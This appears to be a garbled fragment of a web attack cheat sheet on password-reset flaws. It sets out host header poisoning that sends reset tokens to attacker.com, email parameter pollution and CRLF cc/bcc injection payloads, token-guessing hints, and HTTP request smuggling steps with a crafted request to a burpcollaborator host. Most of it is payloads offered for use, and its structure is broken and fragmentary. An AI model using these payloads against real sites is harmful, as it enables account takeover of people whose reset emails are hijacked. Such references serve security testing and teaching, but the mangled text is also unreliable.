Host: attacker.com
, X-Forwarded-Host: attacker.com
http
POST https://example.com/reset.php HTTP/1.1
Accept: */*
Content-Type: application/json
Host: attacker.com
https://attacker.com/reset-password.php?token=TOKEN
# parameter pollution
[email protected]&[email protected]
# array of emails
{"email":["[email protected]","[email protected]"]}
# carbon copy
[email protected]%0A%0Dcc:[email protected]
[email protected]%0A%0Dbcc:[email protected]
# separator
[email protected],[email protected]
[email protected]%[email protected]
[email protected]|[email protected]
powershell
POST /api/changepass
[...]
("form": {"email":"[email protected]","password":"securepwd"})
The password reset token should be randomly generated and unique every time.
Try to determine if the token expire or if it’s always the same, in some cases the generation algorithm is weak and can be guessed. The following variables might be used by the algorithm.
resetToken
https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]
"admin "
The platform CTFd was vulnerable to this attack.
See: CVE-2020-7245
*.domain.com
Refer to HTTP Request Smuggling vulnerability page.
1. Use smuggler to detect the type of HTTP Request Smuggling (CL, TE, CL.TE)
powershell
git clone https://github.com/defparam/smuggler.git
cd smuggler
python3 smuggler.py -h
2. Craft a request which will overwrite the POST / HTTP/1.1
with the following data:
powershell
GET http://something.burpcollaborator.net HTTP/1.1
X:
3. Final request could look like the following
“`powershell
GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0
GET http://something.burpcollaborator.net HTTP/1.1
X: X
```
Hackerone reports exploiting this bug
* https://hackerone.com/reports/737140
* https://hackerone.com/reports/771666
JSON Web Token might be used to authenticate an user.